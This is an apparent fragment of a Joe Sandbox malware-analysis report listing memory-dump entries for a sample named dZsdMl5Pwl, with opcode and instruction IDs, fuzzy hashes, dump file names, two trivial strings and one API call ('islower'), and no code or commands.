                                                          • Source File: 00000000.00000002.2479623411.0000000000981000.00000040.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_980000_dZsdMl5Pwl.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 453b8c5517497ac0e281165ea73c0c0d2dfce68bee61283a6884f424fac74220
                                                          • Instruction ID: eb27ffeb1a5e5418212f602d64a1dc9c7053e995d3cbf17842cc8ab88da7b1d6
                                                          • Opcode Fuzzy Hash: 453b8c5517497ac0e281165ea73c0c0d2dfce68bee61283a6884f424fac74220
                                                          • Instruction Fuzzy Hash: 35C11475915B418BD362CF38C881BEAF7E1BFD9310F109A1DE8EEA6241EB7075848B51
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2479623411.0000000000981000.00000040.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_980000_dZsdMl5Pwl.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 79053331f6c6e833b23fac0a7857f8716a3283740dd6af19cdc65f55aa259766
                                                          • Instruction ID: d92563bd85830e142f65cf0e2aa0744aafad3202ad6ec8fd65ac52d1419744b9
                                                          • Opcode Fuzzy Hash: 79053331f6c6e833b23fac0a7857f8716a3283740dd6af19cdc65f55aa259766
                                                          • Instruction Fuzzy Hash: 46713EA22086500ADB15492D9880BBE6BD79FC2310F9D4A6EE9EDC73C9C635DC4397B1
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2479623411.0000000000981000.00000040.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_980000_dZsdMl5Pwl.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: f92f3e816ba9f18bc3ff67cc49abd5c0d55c512dfc68a332f6ded429224267c2
                                                          • Instruction ID: 5b8619c5eb799e21329c164e3096e584c5776e131f5be57774475f0a78e75571
                                                          • Opcode Fuzzy Hash: f92f3e816ba9f18bc3ff67cc49abd5c0d55c512dfc68a332f6ded429224267c2
                                                          • Instruction Fuzzy Hash: 5081D861D0D7C497E6219B359A427BBB3E4EFA5304F099B68BD8C52153FB30B9D88312
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2479623411.0000000000981000.00000040.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_980000_dZsdMl5Pwl.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 300a992db5e88f295b4c288640f7106079ff714fb01730ea9b1c46287b535b26
                                                          • Instruction ID: 6d31d87600f718b0082dd4ca22aad6a8a15aefc67b566f551d6d59814231ffc0
                                                          • Opcode Fuzzy Hash: 300a992db5e88f295b4c288640f7106079ff714fb01730ea9b1c46287b535b26
                                                          • Instruction Fuzzy Hash: 35713836A08705DBC7209F19D89032AB7E1FF85324F1A872ED9A947394D339ED50CB91
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2479623411.0000000000981000.00000040.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_980000_dZsdMl5Pwl.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: f8eb83c607e5273c8dd3281c9fad2baaf8d53ce7adbf99a9e46935cb47d41568
                                                          • Instruction ID: 5865084c358bf0b7a133ff42211dac0dee4efc161b43667cc028825bc0313240
                                                          • Opcode Fuzzy Hash: f8eb83c607e5273c8dd3281c9fad2baaf8d53ce7adbf99a9e46935cb47d41568
                                                          • Instruction Fuzzy Hash: FA81E772D18BC28BD3259F29C8906B6B7A0FFDA314F144B1EE8E706782E7749681C741
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2479623411.0000000000981000.00000040.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_980000_dZsdMl5Pwl.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 95e421f4e05f34242464261f9e54a0a91c0d7ff49cf8aa3deac7132ae326c2af
                                                          • Instruction ID: 757515712cb6a6607ba66950010e9e7a882a3829cabdcd2ebdb36a5546125020
                                                          • Opcode Fuzzy Hash: 95e421f4e05f34242464261f9e54a0a91c0d7ff49cf8aa3deac7132ae326c2af
                                                          • Instruction Fuzzy Hash: CF811C72D24BC28BD3248F25C8806B6B7A0FFEA354F14971EE8E607782E7749681D740
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2479623411.0000000000981000.00000040.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_980000_dZsdMl5Pwl.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 921c34c39173e01d4fd01daefc413b1551b915bd071126439e8fb8052738128b
                                                          • Instruction ID: f97c7afe29d837190629036baa72de19f73a7b2e11fc4184df0f9c7ccd906082
                                                          • Opcode Fuzzy Hash: 921c34c39173e01d4fd01daefc413b1551b915bd071126439e8fb8052738128b
                                                          • Instruction Fuzzy Hash: 80617872D087C49BD3119F2488802797BA2AFC6344F25836EF9954F393E7789A42C741
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2479623411.0000000000981000.00000040.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                          • Associated: 00000000.00000002.2479598840.0000000000980000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2479623411.0000000000EF1000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2479623411.0000000001057000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2479623411.0000000001059000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2480137023.000000000105C000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2480157187.000000000105E000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2480157187.00000000011EA000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2480157187.0000000001302000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2480157187.0000000001308000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2480157187.00000000013E9000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2480157187.00000000013F1000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2480157187.00000000013FF000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2480479577.0000000001400000.00000080.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2480597176.00000000015C2000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2480616581.00000000015C4000.00000080.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_980000_dZsdMl5Pwl.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 84e764a45e5302a7066ed45be27ba56ab65d1280a1861361001fffb7c0fb9f4a
                                                          • Instruction ID: 51d18c0ef18d1493ca478d0e471c1597f284554068e91c89a77b9cff6905653f
                                                          • Opcode Fuzzy Hash: 84e764a45e5302a7066ed45be27ba56ab65d1280a1861361001fffb7c0fb9f4a
                                                          • Instruction Fuzzy Hash: 8041E377F206280BE74CD9799C6526A73C2D7D8310B4A463DDA96C73C2DDB4DD16A2C0
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2479623411.0000000000981000.00000040.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_980000_dZsdMl5Pwl.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 43ca0627f881cf177445ab0957e0dd518c042ce74fa7e59b5b191a8113bb2889
                                                          • Instruction ID: 5177c5c76a51b47b9204e905f4edc31939882090321b69c2db8a7c7aee1694b9
                                                          • Opcode Fuzzy Hash: 43ca0627f881cf177445ab0957e0dd518c042ce74fa7e59b5b191a8113bb2889
                                                          • Instruction Fuzzy Hash: EC31B03170831A4BC714AD6DC4C432AF6D29BD8360F55C63DE58DC33C8E9718C498692
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2479623411.0000000000981000.00000040.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_980000_dZsdMl5Pwl.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 194b1e9f7992c7b919597fa56089a32913e4a1d6ceb8f728d31f22bf67bf3837
                                                          • Instruction ID: 73611ec35f41007b25a5fce9202801b6883e2ac4db71f462e465c620f56038d1
                                                          • Opcode Fuzzy Hash: 194b1e9f7992c7b919597fa56089a32913e4a1d6ceb8f728d31f22bf67bf3837
                                                          • Instruction Fuzzy Hash: A8F0AF33B752290B93A0CDB66C002D6A2C3A3C0370F1F8565EC84D7502E934CC4696C6
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2479623411.0000000000981000.00000040.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_980000_dZsdMl5Pwl.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: fe21089785e6a1748e56388996be618063e6c4318fc8050aa5774256bf8bb64f
                                                          • Instruction ID: 7f4b88bf07616e8e474cfcb6dbf9f26b42e2204cd7ce33a07205f9c80d446486
                                                          • Opcode Fuzzy Hash: fe21089785e6a1748e56388996be618063e6c4318fc8050aa5774256bf8bb64f
                                                          • Instruction Fuzzy Hash: D6F01C33A20A344B6360CD7A8D05597A2D797C86B0B1FC969ECA5E7206E930EC0656D5
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2479623411.0000000000981000.00000040.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_980000_dZsdMl5Pwl.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: bdcf086d586c4ec4274e0968b85a83c89ceaa0456a8cae9f7af5669cb13b7d3c
                                                          • Instruction ID: 2046f3be47508ea9c80432742467d5aade5ebeb4f18983dc59afca27fc57002a
                                                          • Opcode Fuzzy Hash: bdcf086d586c4ec4274e0968b85a83c89ceaa0456a8cae9f7af5669cb13b7d3c
                                                          • Instruction Fuzzy Hash: B1B012319003004B5716C934D8710A633F2B39130039DC4E8D00345045D63FD0038704
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2479623411.0000000000981000.00000040.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_980000_dZsdMl5Pwl.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: [
                                                          • API String ID: 0-784033777
                                                          • Opcode ID: 59393b298f113657f03d7e68c84bfd9f14eaac6b529a2f5f2a2f4d019afc0762
                                                          • Instruction ID: e9fa1471da65ff6086b7b30e9d52991ec55f45ce20567873c2bbb348892f7edf
                                                          • Opcode Fuzzy Hash: 59393b298f113657f03d7e68c84bfd9f14eaac6b529a2f5f2a2f4d019afc0762
                                                          • Instruction Fuzzy Hash: B2B1357190C3C16BDB378A27889577A7BDCEB75384F2C092DE9C5C6182EA29DC448762
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2479623411.0000000000981000.00000040.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_980000_dZsdMl5Pwl.jbxd
                                                          Similarity
                                                          • API ID: islower
                                                          • String ID: $
                                                          • API String ID: 3326879001-3993045852
                                                          • Opcode ID: ea0f4f2f02c77cff6850d85ad844458c6e7b1f7dbe77ef8bfb68b44ec121d332
                                                          • Instruction ID: b018bb4e69fcd8eb8fd218cd427afb95fd212a5dbac45988663cafaeaaa60e39
                                                          • Opcode Fuzzy Hash: ea0f4f2f02c77cff6850d85ad844458c6e7b1f7dbe77ef8bfb68b44ec121d332
                                                          • Instruction Fuzzy Hash: A361827060C3458BC7149F69C48032EBBE2AFC5324F288A2EE4DD8B3D1E774D9459B66